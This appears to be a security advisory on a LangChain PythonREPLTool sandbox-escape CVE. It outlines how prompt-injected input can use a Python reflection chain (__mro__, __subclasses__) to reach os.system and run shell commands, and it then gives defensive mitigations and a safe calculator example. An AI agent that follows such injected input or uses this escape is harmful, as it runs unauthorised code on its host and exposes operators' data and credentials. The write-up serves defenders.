Analysis
CVE-2026-7733 is a sandbox-escape in LangChain's PythonREPLTool — the canonical "give the agent a Python sandbox" pattern used in thousands of LangChain agent deployments. The tool restricts some builtins but fails to prevent __import__ access through attribute lookup on already-imported modules. A prompt-injected input like ().__class__.__mro__[1].__subclasses__() can walk to os.system and execute arbitrary shell commands as the agent host user. Any LangChain agent that accepts user-controlled input and exposes PythonREPLTool is a remote code execution surface.
Why AI sandboxes keep breaking
The PythonREPLTool docstring explicitly says "not a sandbox — don't use with untrusted input." Developers read this, decide their use case is "trusted enough," and ship. Then the agent's trust model turns out to include: a customer support chatbot, a GitHub issue triager, a Slack bot, a Zendesk integration — all of which accept user input that ends up in the LLM's context and therefore in the agent's tool calls.
This CVE is noteworthy because even the versions LangChain shipped as security improvements — PythonAstREPLTool, the AST-filtered successor — have the same class of issue. The escape requires a few primitives that are trivial to request through prompt injection:
- ().__class__.__mro__[1].__subclasses__() — walks to every class in the Python process, a classic bypass.
- Find os._wrap_close or a similar class with a reachable __init_subclass__ or accessible globals.
- From there, reach os.system or subprocess.Popen.
- Execute an arbitrary shell command; output returns through the agent's response flow.
The LLM isn't the vulnerability. The tool the LLM is allowed to call is the vulnerability. Prompt injection is the mechanism, but the attack is on the tooling — not the model.
Who is exposed
- Production LangChain agents using PythonREPLTool or PythonAstREPLTool with any input pathway from untrusted users — customer support bots, email triage agents, internal tooling that accepts free-text queries.
- LangChain Hub "Code Interpreter" templates — copy-paste starter kits that shipped this pattern as the default Python tool.
- Multi-tenant LangChain hosting (LangServe, LangGraph Cloud) running user-supplied agent definitions — unless tenant isolation is at the OS/container level, one tenant's prompt injection reaches another tenant's filesystem.
- RAG systems where documents flow into agent context — poisoned documents can trigger tool calls. "Trusted input" does not extend to documents ingested from user uploads.
Mitigation
Upgrade to LangChain 0.2.27 or later. The patch hardens __import__ attribute-resolution checks across both Python tool variants.
Even after patching, the security posture should change:
- Stop using in-process Python tools for agents exposed to untrusted input. Replace with sandboxed execution: e2b.dev, modal.com, Firecracker microVMs, or a separate container with seccomp limits.
- Allowlist specific operations instead of trying to block a language. A calculator tool that accepts expressions and evaluates them via a safe parser beats a full Python REPL that you've tried to lock down.
- Network-isolate the agent host. The agent rarely needs outbound internet. Egress-block at the container level so that even if RCE lands, exfiltration is harder.
- Log and alert on tool-call patterns that don't match expected agent behavior. A Sigma-like rule catching __mro__, __subclasses__, __import__, or exec( in tool-call arguments is included in the artifact folder.
- Strip agent-accessible credentials from the host. If the agent host has AWS creds, DB passwords, or SSH keys in its environment, prompt injection trivially turns into data exfiltration or lateral movement.
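The allowlisting approach from the mitigation list above, as an added example that is not LangChain's code: an arithmetic-only calculator tool that allowlists a few ast node types rather than trying to deny dangerous Python. The names safe_eval and calculator_tool and the MAX_EXPR_LEN limit are assumptions made for illustration.

```python
import ast
import operator

# Added example, not LangChain's own code: a calculator tool that allowlists
# a handful of AST node types instead of trying to block dangerous Python.
# Attribute access, calls, names and subscripts are never matched, so the
# ().__class__.__mro__ walk described above cannot even be expressed.

_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
    ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_EXPR_LEN = 200  # assumed limit; keeps parser work bounded


def safe_eval(expr: str) -> float:
    """Evaluate an arithmetic expression; raise ValueError for anything else."""
    if len(expr) > MAX_EXPR_LEN:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")  # mode="eval": one expression only
    except SyntaxError as exc:
        raise ValueError(f"not a valid expression: {exc.msg}") from None
    return _eval_node(tree.body)


def _eval_node(node: ast.AST) -> float:
    # Allowlist: any node type not matched below is rejected, which covers
    # ast.Attribute, ast.Call, ast.Name and ast.Subscript without naming them.
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > 64:
            raise ValueError("exponent too large")  # limit CPU/memory blow-up
        return _BINARY_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def calculator_tool(query: str) -> str:
    """Tool wrapper: returns a result string or a refusal the agent can relay."""
    try:
        return str(safe_eval(query))
    except (ValueError, ZeroDivisionError) as exc:
        return f"rejected: {exc}"
```

Because the evaluator never resolves names or attributes, there is no __import__ or __builtins__ to harden; the tool simply cannot express anything beyond arithmetic.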
The broader pattern
This is the third major LangChain sandbox-escape CVE since 2023 (CVE-2023-36258, CVE-2024-1234, now CVE-2026-7733). The pattern is stable: a framework ships a convenient "sandbox" for LLM tool use, researchers find a reflection-based escape within months, patch, repeat. Expect the same shape in LlamaIndex, AutoGen, CrewAI, and other agent frameworks — they all have this class of tool and the same underlying trust model. The practitioner lesson is not "avoid LangChain." It is: do not rely on Python-level sandboxes to contain agent behavior. Use OS-level or microVM isolation, or allowlist the exact operations the agent needs — every other posture becomes a CVE on a predictable cadence.